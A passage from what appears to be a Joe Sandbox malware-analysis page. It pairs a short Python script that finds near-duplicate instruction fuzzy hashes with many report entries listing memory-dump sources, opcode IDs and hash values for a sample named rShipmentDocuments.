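"""Near-duplicate detection over Joe Sandbox "Instruction Fuzzy Hash" values.

Added example; not part of the Joe Sandbox report. Joe's fuzzy-hash
algorithm is not described on the page, so similarity is assumed to be
expressible as the fraction of agreeing hex positions (a crude proxy).
"""
from itertools import combinations

# Hash values copied from the report entries above, keyed by the first
# eight characters of each entry's Opcode ID.
FUZZY_HASHES = {
    "aba7deaa": "9552B478D40259CFCF54EF24E984B99BBB2FB49305F5089A9D409AB358DB306E85DF80",  # String ID LR^q
    "d1b1c85f": "F052B478D40219CFCF54EF24E984B99BBB2FB49305F5089A9D409AB358DB306E95DF80",  # String ID LR^q
    "439786d4": "8D12AC748A1246CFEA402F30E1AC13E7B61FF5F3A3B45AD04F11F8E4459B7594A8CA66",  # no strings
    "1d178de7": "59129C748A1246CFEA402F30E1AC13E7B61FF5F3A3B45AD04F11F8E4459B7594A8CA66",  # no strings
    "e3af2998": "6F117974E102098FDF44DFA8D884BADBBF5FF88318F248165EA04E7245DB30A941CB60",  # LdrInitializeThunk
}


def nibble_similarity(a: str, b: str) -> float:
    """Fraction of hex positions on which two digests agree.

    Digests of unequal length are compared over the common prefix and the
    length difference counts against the score, so a truncated hash can
    never look identical to a complete one.
    """
    a, b = a.upper(), b.upper()
    common = min(len(a), len(b))
    matches = sum(1 for x, y in zip(a[:common], b[:common]) if x == y)
    return matches / max(len(a), len(b))


def near_duplicates(hashes: dict, threshold: float = 0.9) -> list:
    """Return (id1, id2, similarity) for every pair scoring >= threshold.

    Pairs are sorted by descending similarity; ids within a pair are in
    sorted order so the result is deterministic.
    """
    pairs = []
    for (id1, h1), (id2, h2) in combinations(sorted(hashes.items()), 2):
        score = nibble_similarity(h1, h2)
        if score >= threshold:
            pairs.append((id1, id2, round(score, 3)))
    return sorted(pairs, key=lambda p: -p[2])


if __name__ == "__main__":
    for id1, id2, score in near_duplicates(FUZZY_HASHES):
        print(f"{id1} ~ {id2}: {score:.3f}")
```

With the page's values the two unnamed functions agree on 67 of 70 positions and the two LR^q functions on 66 of 70, while every other pairing (for example against the LdrInitializeThunk stub) falls far below the 0.9 cut-off. A real fuzzy-hash comparison would use the vendor's own distance function; the point of the positional proxy is only that near-identical digests in a dumped region are worth de-duplicating before spending analyst time on each copy.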
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1dc279530da42fcdff46cb6281bf3a62ab6832675dfbb94cc60ee9fbf2735b4
                                                      • Instruction ID: a2bbe41a6049ed2d5d90ed7081d18211b9cf64be6fc9cd3e7672923ab12f4c07
                                                      • Opcode Fuzzy Hash: b1dc279530da42fcdff46cb6281bf3a62ab6832675dfbb94cc60ee9fbf2735b4
                                                      • Instruction Fuzzy Hash: B88106319006069FC712CF28D880A9BBBF6FF85324B15C665E91897355DB71F812CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f06596bebf5314a05050dec357245a1f11afd80d4db2e2a0b7c13622c08af0d9
                                                      • Instruction ID: b3b96499e43e952a731eeea18215ffed2e19101990e773cc98c78e0a40a38265
                                                      • Opcode Fuzzy Hash: f06596bebf5314a05050dec357245a1f11afd80d4db2e2a0b7c13622c08af0d9
                                                      • Instruction Fuzzy Hash: 247139347006058FCB16DFA8C894A6ABBE6BF89244B1504A9F826DB370DF78DC45CB51
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6c4957c5dab322e6f1aa13f1da9b2176c9c1191b5e8d4492d7f76b5cccfe9ff
                                                      • Instruction ID: 9247f485b3c485f92e65e28e3914a2283fe4e2108a027e1db9664c3ac6783169
                                                      • Opcode Fuzzy Hash: f6c4957c5dab322e6f1aa13f1da9b2176c9c1191b5e8d4492d7f76b5cccfe9ff
                                                      • Instruction Fuzzy Hash: 0061F174D00219DFDB15DFA5D984BADBBB2FF88314F208529E80AAB354DB359946CF40
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce92d1dc380eeb22d2c553a279c767ba96d781e53170b6bf75c33e4d65384d54
                                                      • Instruction ID: 8388b8d6eacc424642bdde1162f2999dcfa9b0dc24a8df3f203f2372baf1eb29
                                                      • Opcode Fuzzy Hash: ce92d1dc380eeb22d2c553a279c767ba96d781e53170b6bf75c33e4d65384d54
                                                      • Instruction Fuzzy Hash: 9C41B530700211DFCB169F3994A473A7ABABF88644F148869E456CB396DF38CC45D795
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0ce0d6a906e3a16423b285b7db5de85ae31d6d57a703142a9520a6f86610a22
                                                      • Instruction ID: 4a47ff2ce351647f150df1930e7cbe1fa3a1d3288193f9ba10dce0e07f2fed8b
                                                      • Opcode Fuzzy Hash: f0ce0d6a906e3a16423b285b7db5de85ae31d6d57a703142a9520a6f86610a22
                                                      • Instruction Fuzzy Hash: 6D518174E01218DFDB48DFA9D9849DDBBF2BF89300F249169E819AB364DB31A901CF10
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 12524c5623186de311cff0c1b2379f0a80a33a7370ca8b241acdaad4f8be1610
                                                      • Instruction ID: 31417039e18978995ee903e624fe5fcd5bf070ac754013e010327c57fa02c13e
                                                      • Opcode Fuzzy Hash: 12524c5623186de311cff0c1b2379f0a80a33a7370ca8b241acdaad4f8be1610
                                                      • Instruction Fuzzy Hash: CD51A774E01208CFCB49DFA9D58499DBBF2FF89314B209469E809AB324DB35AD42DF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 117877bb1a7a015bf038b9b047cd0d177f375d39bc710fd6b9e72eef5ba504fb
                                                      • Instruction ID: 504ad44eb8f81cf905a47540b73bf9709fc87f9c0582f7b947d49a8d9b3d0239
                                                      • Opcode Fuzzy Hash: 117877bb1a7a015bf038b9b047cd0d177f375d39bc710fd6b9e72eef5ba504fb
                                                      • Instruction Fuzzy Hash: C1419335A00269DFCF12CFA8C884B9DBBB2FF49364F048555F9959B262D734E914CB50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9f0685001711ee347b09898008e87e1597708540c6b7ee1cb22f5c439800556
                                                      • Instruction ID: d9775a5afcf94cda6f8bff9859cea61c725de14cb509d640462fe1ecc6c5e817
                                                      • Opcode Fuzzy Hash: d9f0685001711ee347b09898008e87e1597708540c6b7ee1cb22f5c439800556
                                                      • Instruction Fuzzy Hash: 9331A031A00249DFCF06AF68D884AAF3BA2FB4D244F044464F9169B354CB39CD21DBA0
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3152b162437785d4f2e7863ddaed212feae617b3e71713cadc14f5114065ab2
                                                      • Instruction ID: 58b0e9b1f75c045a09e1c922f94e1a54c60facbb2596b76d5e7a9362f9776d75
                                                      • Opcode Fuzzy Hash: f3152b162437785d4f2e7863ddaed212feae617b3e71713cadc14f5114065ab2
                                                      • Instruction Fuzzy Hash: 2331C136B00214DFCB09AF69D854BAEBBB6FB8C250F144469E916DB381DF359C11CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68b862d3eefcdb7b10da5008af98f9fd5463b50e0e409d86ac11beb10c74448f
                                                      • Instruction ID: 6b93472f950d378212e810d78b2ba2da7ccb0e1c0ac158bde9e12b92fed791ad
                                                      • Opcode Fuzzy Hash: 68b862d3eefcdb7b10da5008af98f9fd5463b50e0e409d86ac11beb10c74448f
                                                      • Instruction Fuzzy Hash: B9218E313002118FDB265B25C59473EA697AFC4B68F148439F516CBBA8EF6ECC42D782
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ddd7eb8b915be46bb66ef0591d7af7c39bc6014a82f98f9ff0669b7a8a871a7e
                                                      • Instruction ID: dea7eb5366b0331007a8b603266d2a503384b0d1063a92ec40c1458e61a2eaf6
                                                      • Opcode Fuzzy Hash: ddd7eb8b915be46bb66ef0591d7af7c39bc6014a82f98f9ff0669b7a8a871a7e
                                                      • Instruction Fuzzy Hash: DD21F635705611DFCB1A9B29D49462EB7A6FFCAB5971444A9F826CB398CF30DC02CB84
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0efa47254643992f9147a713b4d267b1917577b2e405a9144012164a18c75e91
                                                      • Instruction ID: cdfcad3cf58948d4333f0f2147563d5b359fdcc671a7ded0c263e7d902c56e64
                                                      • Opcode Fuzzy Hash: 0efa47254643992f9147a713b4d267b1917577b2e405a9144012164a18c75e91
                                                      • Instruction Fuzzy Hash: 33219D75A001159FCB25DF24C480AEE77A5EB9E364B20C419E84A9B240DF34EE43CBD2
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136591855.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_29ed000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9ace5d5bf721f0b951304e4c706bf07c595c53a04f8be0353d64c890d906fc6
                                                      • Instruction ID: 51afda7ccecc45eec74eae7779813463929fd3bf961cca4ca560b4344596a51c
                                                      • Opcode Fuzzy Hash: c9ace5d5bf721f0b951304e4c706bf07c595c53a04f8be0353d64c890d906fc6
                                                      • Instruction Fuzzy Hash: AE210471504204DFDF16DF24C9C4B26BBA9FB88314F28C96DE84A4B292C73AD446CA72
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9098434da6aa5e818fb470428e2a7dfe76c617e1694dbaa24f955c3c32d914e3
                                                      • Instruction ID: 5afb4c808ed25b53edb34ecf5c15585651d6ab630f44cce5277de55994a3d6b1
                                                      • Opcode Fuzzy Hash: 9098434da6aa5e818fb470428e2a7dfe76c617e1694dbaa24f955c3c32d914e3
                                                      • Instruction Fuzzy Hash: 7B31B078E01308CFCB45EFA8E58499DBBB6FF4A304B204469E819AB324DB31AD41CF00
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f5ae17d98879d8311b200a55bfefd90c00baba48c00222aba4a50023f86f8cd
                                                      • Instruction ID: 66786f8e3521f38452b553dd687786ea2d1e207c12551527baee9ab0bb92d0e3
                                                      • Opcode Fuzzy Hash: 3f5ae17d98879d8311b200a55bfefd90c00baba48c00222aba4a50023f86f8cd
                                                      • Instruction Fuzzy Hash: 4621A132A05159DFCF15AF68E4847AF3BA1FB49314F044468F8168B358CB38DD61DBA1
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d03b4096fdeb9b56cfb4bfa2a86314db42258895969fe7f5dd320ea60a7a5a8b
                                                      • Instruction ID: ef9eb2b5f318a0715dfb41345a140e5aeb351ac36146052054d4d0b7db07d79c
                                                      • Opcode Fuzzy Hash: d03b4096fdeb9b56cfb4bfa2a86314db42258895969fe7f5dd320ea60a7a5a8b
                                                      • Instruction Fuzzy Hash: E5216830E0124ADFDB05CFA5D590AEEBFBAAF49205F148069F411E7294DB349941EB20
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 186cb4d5d6d8eded4aeffca3b4b96b7c1182047784a165cf0acb3dcfc70b144b
                                                      • Instruction ID: 58be3745ad4ad0ef7101ca9254945c2679ed90bf4149bf2f65561bed1eadb913
                                                      • Opcode Fuzzy Hash: 186cb4d5d6d8eded4aeffca3b4b96b7c1182047784a165cf0acb3dcfc70b144b
                                                      • Instruction Fuzzy Hash: EA117F76B00204EBCF109F54D884B9DBBB6FB8C350F148426F915EB290DB71AC10CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2db1db5e226cbf3a27f2a470be39ac12240970960f751f32121f605e9e8967d0
                                                      • Instruction ID: b49f7fb1d2c7bcaefcc305b0e7c7496eda92c549d1ebbc00ca4785621a7347c0
                                                      • Opcode Fuzzy Hash: 2db1db5e226cbf3a27f2a470be39ac12240970960f751f32121f605e9e8967d0
                                                      • Instruction Fuzzy Hash: AA11C835701511AFCB1A5B2AD49492E77AAFFC9B9531944B8F826CB364CF31DC02CB94
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adef99e06451d27dfdda6095ae27e487f90b4674e16e3956539b6a3117b062fe
                                                      • Instruction ID: 53b76e7d69324d587720e01780d35d37918afff0d46a60fcacd51b92f87da9d9
                                                      • Opcode Fuzzy Hash: adef99e06451d27dfdda6095ae27e487f90b4674e16e3956539b6a3117b062fe
                                                      • Instruction Fuzzy Hash: FB213BB1D001099FDB05EFA9D58079EBBB2FB45304F0095A9D058DB365EB749A499F80
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6586dbe34723650373a4de17181e68d09ffbf07077b606b42da6bc1152f465fa
                                                      • Instruction ID: 7ca15ddaca72c43cc82431b28a8199d58ee3b3cf0135bbce84234b769e60160c
                                                      • Opcode Fuzzy Hash: 6586dbe34723650373a4de17181e68d09ffbf07077b606b42da6bc1152f465fa
                                                      • Instruction Fuzzy Hash: C2113A70D00109DFCB45EFA9D58079EBBF2FB45304F1095A9D018DB369EB309A499F80
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81cc077cb72a490160038973579c10a2255a0ed29995e6993b90ddbd8dc22df6
                                                      • Instruction ID: 506e703b458a19d1f66bf5d03b54891fdc008a26b9b77239ad0abe1b74e537e3
                                                      • Opcode Fuzzy Hash: 81cc077cb72a490160038973579c10a2255a0ed29995e6993b90ddbd8dc22df6
                                                      • Instruction Fuzzy Hash: 3621CEB4D0060ACFCF01EFA9D4856EEBBF1FF59210F10556AD809B7210EB345A99CB91
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136591855.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_29ed000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: d08e0ce86dfacb1d1da100a7dd0932c1a975d151f3c6eb54d3c7c1148287c9de
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 9511D075504244CFCF16CF10C5C4B15BF65FB44314F28C6A9D84A4B252C33AD44ACF62
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85d0a951e6f3dd5f3360a23d69dcf59921038c0f342db7900ae2b600cc77af12
                                                      • Instruction ID: 6072dda90575d64300fe5ba6a391e1fff6477b543299ecbc2f77e403ccd7d1f2
                                                      • Opcode Fuzzy Hash: 85d0a951e6f3dd5f3360a23d69dcf59921038c0f342db7900ae2b600cc77af12
                                                      • Instruction Fuzzy Hash: A501B133A00215ABCB059EA9D840BAF3BEAFBCC694F148029F515CB240CF7589219BA4
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b61210bb7f475a81d65d5d33698b2971050e92cedc0608b636f493d54f1ff936
                                                      • Instruction ID: b5b87fad183b51b4beca217ba98e9ff5413b4d37c8a3d5d021384bdde84ce14a
                                                      • Opcode Fuzzy Hash: b61210bb7f475a81d65d5d33698b2971050e92cedc0608b636f493d54f1ff936
                                                      • Instruction Fuzzy Hash: E0F09C317406204B8B175B6E949462A76DEEFC9955355407AF546CB362DF21CC038790
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bddbfa85210abda3671f7689382c4cf4069701b428174991c806393efc93433
                                                      • Instruction ID: 41669db5a806c4ea515d66e05941b0fe3eda438567ee843d318ee467f87fccb1
                                                      • Opcode Fuzzy Hash: 2bddbfa85210abda3671f7689382c4cf4069701b428174991c806393efc93433
                                                      • Instruction Fuzzy Hash: 5A016574D0020AEFCF40DFA8E884AEEBBB1FB49304F008425E810A3304D7345A12DF91
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcbd58049a624606989b252e4ca47b269f783056910103daa2baa8effb29f823
                                                      • Instruction ID: d4d6e1ea5e8cad2d2654dcacad89cbcf75117f355b2331b1a19eb975ba1e1102
                                                      • Opcode Fuzzy Hash: fcbd58049a624606989b252e4ca47b269f783056910103daa2baa8effb29f823
                                                      • Instruction Fuzzy Hash: 8CE08676E5032A87CB01EBB0DD040EEB735AFD1221F59451BC4A532180EB30665A8792
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f29641ee47913da3220ebff5a7961da3f13df7957e61362b255a518f03c18855
                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                      • Opcode Fuzzy Hash: f29641ee47913da3220ebff5a7961da3f13df7957e61362b255a518f03c18855
                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a351aa77bde1997cfc5ab900d77af0364a89b611f1cad614f1547aa79b9a73d
                                                      • Instruction ID: 96a20c8d04e8c027be868557d2f3043eb2b6d51c958c78dbea7818f36243f399
                                                      • Opcode Fuzzy Hash: 8a351aa77bde1997cfc5ab900d77af0364a89b611f1cad614f1547aa79b9a73d
                                                      • Instruction Fuzzy Hash: 73D0E234E44008CBCF20DFB8E4844DCBB74EB88321B10542AE825A7210D6305460CF00
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4baebb448c867e67a9175068b5a84763477548b33382754b2535e9b1d2ff6263
                                                      • Instruction ID: d41ea84c4c58f40cd4947e0c418a48b588aa251b39cb90ff629a9a27bc79a5e0
                                                      • Opcode Fuzzy Hash: 4baebb448c867e67a9175068b5a84763477548b33382754b2535e9b1d2ff6263
                                                      • Instruction Fuzzy Hash: 35D02E3345030A8ECB00F720EC42B047B6AB780208F009520E0154B21EEF78A8648B40
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eee6703129eb76f5471c1ac5fa716d3ec6400d9db94f8b8d92040ca2d893bf3d
                                                      • Instruction ID: a7af40af0fa7439ff073fdc04d660932f67dff72ca53cad15f0b1c34cacc13a7
                                                      • Opcode Fuzzy Hash: eee6703129eb76f5471c1ac5fa716d3ec6400d9db94f8b8d92040ca2d893bf3d
                                                      • Instruction Fuzzy Hash: BED0673AB40018DFCF049F99E840CDDF7B6FB98261B148516E915A7261CA319925DB54
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee1e29dd38130649b40bb1bb444613d3d646e066bdd2c66854e2ac972e7feda1
                                                      • Instruction ID: 4e8a94c366f1937df7520f3d0447f3a901e49e53cbd1a26111d4845ec03c6213
                                                      • Opcode Fuzzy Hash: ee1e29dd38130649b40bb1bb444613d3d646e066bdd2c66854e2ac972e7feda1
                                                      • Instruction Fuzzy Hash: E8C080314443194FC905F775FD45659772FF6C02047509530D4094B75DEF745CA95790
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .5vq
                                                      • API String ID: 0-493797296
                                                      • Opcode ID: 1d3c3d120ec100b4d9d3391f017eef0745ede84a9a5b9e61b9881d6b56294ba3
                                                      • Instruction ID: 226a77457163b0ae80ee712499b3ae72acbaac92c45621dad9f1c8b4a6f49bd5
                                                      • Opcode Fuzzy Hash: 1d3c3d120ec100b4d9d3391f017eef0745ede84a9a5b9e61b9881d6b56294ba3
                                                      • Instruction Fuzzy Hash: F152B974E01228CFDB64DF69C984B9DBBB2BF89300F1085EAD509AB255DB359E81CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6823cd61ba80a7694dc2c36ca800466dfa1c2155e63e061f9e7bfb8b755c0698
                                                      • Instruction ID: 7727b268b3119a239caf8a23da021cd301b6925a7d84b2998102d9f9246c617f
                                                      • Opcode Fuzzy Hash: 6823cd61ba80a7694dc2c36ca800466dfa1c2155e63e061f9e7bfb8b755c0698
